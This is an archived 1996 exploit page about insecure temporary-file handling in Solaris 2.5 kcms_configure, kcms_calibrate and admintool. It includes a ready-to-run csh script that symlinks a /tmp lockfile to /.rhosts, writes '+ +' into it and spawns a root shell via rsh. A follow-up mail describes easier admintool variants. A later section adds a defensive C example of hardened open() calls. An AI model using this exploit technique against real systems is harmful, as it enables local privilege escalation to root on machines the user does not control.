Solaris admintool and /usr/openwin/bin/kfcs_* tmpfile vulnerabilities
Description: Standard insecure tempfile creation, symlink to /.rhosts exploit
Author: Jungseok Roh (beren@cosmos.kaist.ac.kr) posted the kcms_* stuff, Leif Hedstrom (leif@netscape.com) posted that admintool had the same problem.
Compromise: root (local)
Vulnerable Systems: Solaris 2.5.[01]
Date: 26 July 1996
Exploit:
Wow.. I got a chance to use an Ultra Sparc which runs Zolaris 2.5 several days ago ~
then one of my seniors told me that there might be a funny, also UNCONCEIVABLE
bug in Openwindows.. I trusted him...
and I traversed the file system under /usr/openwin ..
there were just four SUIDed files .. ( if Admin installed openwin packages )
xlock , ff.core , kcms* .. Problem made less vague
kcms_calibrate , kcms_configure are the objects we are approaching.
When examining the kcms family, I found a funny thing.
kcms_configure makes the temporary(?) files in /tmp whose permission bits
are 666 ( Wow The sign of the Devil ),, definitely root owns it..
ITS NAME is Kp_kcms_sys.sem !...
Then all u guys know what the next procedure is.
hk.. I can't show u the whole procedure right now.
'Cause My Zolaris machine is "Network Unreachable ...".
One odd thing is that exploitation succeeds when it interacts with kcms_calibrate!!
The major procedure is making the temporary file which is linked to /.rhosts, then
while kcms_configure tries to write /.rhosts make Thunder roll using
kcms_calibrate and Make its power Powerful.. puha.. it's like seeing
Back To the Future III... then kcms_configure succeeds in its operation.
I made a simple script exploiting the machine which has that fatal bug.
hmm..but I can't erase one curiosity ..
Why did Sun make this humble mistake ? ... plz somebody notify SUN of this bug.
I don't know Her E-mail Address .. :)
(what a simple!!) script follows .
this script shows u just the PROCEDURE .. re-make on your demands .
cat > uhit.sh << E_O_F
#!/bin/csh
# JungSeok. Roh ( beren@cosmos.kaist.ac.kr )
# Junior in KAIST undergraduate. Under Management Dep .
set disp="cosmos.kaist.ac.kr:0.0"
setenv DISPLAY $disp
/bin/rm -rf /tmp/Kp_kcms_sys.sem
cd /tmp
#Making symbolic link
ln -s /.rhosts Kp_kcms_sys.sem
/usr/openwin/bin/kcms_calibrate &
while(1)
echo "Click the device you've chosen in kcms_calibrate window"
# Choose Any profiles .. hk..
# My 2.5 machine is unreachable so I can't get the exact name of that profile.
# What a fool I am.. jjap..
/usr/openwin/bin/kcms_configure -o -d $disp /usr/openwin/share/etc/devdata/profiles/Eksony17.mon
if( -f /.rhosts ) then
echo -n "+ +" >> /.rhosts
# As u know , we can't login as root .. use smtp account. that has UID 0 !!
/usr/bin/rsh localhost -l smtp csh -i
endif
end
E_O_F
__
There was a Legendary Security Task Force team whose Name is K/U/S ..
But BLOWN up by the KOREAN National Prosecutor.. I hate them !! .......
They make me so sad .... Laughin' in bitter tears ... hk..hk..
JungSeok Roh / Junior in KAIST / beren@cosmos.kaist.ac.kr / +82-42-869-5400
------------Another mail:
From: anthony baxter (anthony.baxter@aaii.oz.au)
Date: Fri, 26 Jul 1996 15:10:25 +1000
> Fwiw, I believe "admintool" in Solaris-2.5 has exactly the same problem.
> /tmp/.group.lock for instance is created 666, no security checks...
> Just go to the "Groups" menu, and you'll have a nice and clean /.rhosts
> file to play with... :(
Hell, even easier, /tmp/.pwd.lock - you don't even need to select 'groups'. :)
or /tmp/.hosts.lock, and select 'hosts'.
cat 'clue' | admintool_author@sun.com
chmod ug-s /usr/bin/admintool (it's the only way to be sure)
truss/strace/sctrace/equivalent on applications such as these can be
quite enlightening (if nothing else, look for 'open()' calls).
Anthony
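The root cause in both the kcms_* and admintool reports is the same open() pattern, and it is what Anthony's truss suggestion would surface. The following is an added example, not code from either mail or from Sun: the insecure opener beside a hardened one, run against a constructed scratch directory holding a dangling symlink with the lockfile's name. It assumes a modern open() with O_NOFOLLOW, which Solaris 2.5 did not have (there the fix was a private, non-world-writable directory or mkstemp-style unpredictable names).

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Vulnerable pattern (as kcms_configure/admintool behaved): fixed name,
 * O_CREAT without O_EXCL, mode 0666. If that name is already a symlink,
 * open() follows it and a root process writes the link target. */
int open_lockfile_insecure(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened pattern: O_EXCL refuses an existing entry, O_NOFOLLOW refuses a
 * symlink at the final component, and 0600 keeps other users out. */
int open_lockfile_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Reproduces the attack setup in a private scratch directory: a dangling
 * symlink with the lockfile's name pointing at a "victim" file. Returns 1
 * when the insecure opener created the victim through the link and the
 * hardened opener refused, 0 otherwise. */
int demo(void) {
    char dir[] = "/tmp/kcmsdemoXXXXXX";   /* constructed scratch dir */
    char target[256], link[256];
    int fd, followed = 0, refused = 0;
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(target, sizeof target, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/Kp_kcms_sys.sem", dir);
    if (symlink(target, link) != 0) return 0;

    fd = open_lockfile_insecure(link);
    if (fd >= 0) { close(fd); followed = (access(target, F_OK) == 0); }
    unlink(target);                              /* reset for the second try */

    fd = open_lockfile_safe(link);
    if (fd < 0 && (errno == EEXIST || errno == ELOOP)) refused = 1;
    else if (fd >= 0) close(fd);

    unlink(link); unlink(target); rmdir(dir);
    return followed && refused;
}
int main(void) {
    puts(demo() ? "insecure open followed the symlink; hardened open refused it"
                : "unexpected result");
    return 0;
}
```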
This page is part of Fyodor's exploit world.